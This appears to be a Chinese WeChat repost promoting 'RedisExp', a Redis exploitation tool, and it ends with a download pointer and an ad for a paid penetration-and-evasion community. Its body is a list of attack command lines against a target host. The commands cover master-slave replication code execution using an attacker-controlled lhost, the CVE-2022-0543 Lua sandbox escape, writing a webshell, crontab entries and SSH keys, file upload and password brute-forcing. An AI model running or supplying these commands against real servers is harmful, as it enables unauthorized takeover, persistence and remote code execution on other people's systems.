0x01 工具介绍
Redis 漏洞利用工具。
0x02 安装与使用
常用命令:
主从复制命令执行:RedisExp.exe -rhost192.168.211.131-lhost192.168.211.1-execRedisExp.exe -rhost192.168.211.131-lhost192.168.211.1-exec-consoleLinux:RedisExp.exe -rhost192.168.211.131-lhost192.168.211.1-exec-so exp.soRedisExp.exe -rhost192.168.211.131-lhost192.168.211.1-exec-console -so exp.so主从复制文件上传:RedisExp.exe -rhost192.168.211.131-lhost192.168.211.1-rfile dump.rdb -lfile dump.rdb -upload主动关闭主从复制:RedisExp.exe -rhost192.168.211.131-slaveofLua沙盒绕过命令执行 CVE-2022-0543:RedisExp.exe -rhost192.168.211.131-lua -console备份写 Webshell:RedisExp.exe -rhost192.168.211.131-shellLinux 写计划任务:RedisExp.exe -rhost192.168.211.131-crontabLinux 写 SSH 公钥:RedisExp.exe -rhost192.168.211.131-ssh爆破 Redis 密码:RedisExp.exe -rhost192.168.211.131-brute -pwdf ../pass.txt执行 Redis 命令:RedisExp.exe -rhost192.168.211.131-cli
翻到文章最底部点击“阅读原文”下载链接
欢 迎 加 入 星 球 !
代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员
进成员内部群
关 注 有 礼
还在等什么?赶紧点击下方名片关注学习吧!
还在等什么?赶紧点击下方名片关注学习吧!
推荐阅读
原文始发于微信公众号(渗透安全团队):Redis漏洞利用工具
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论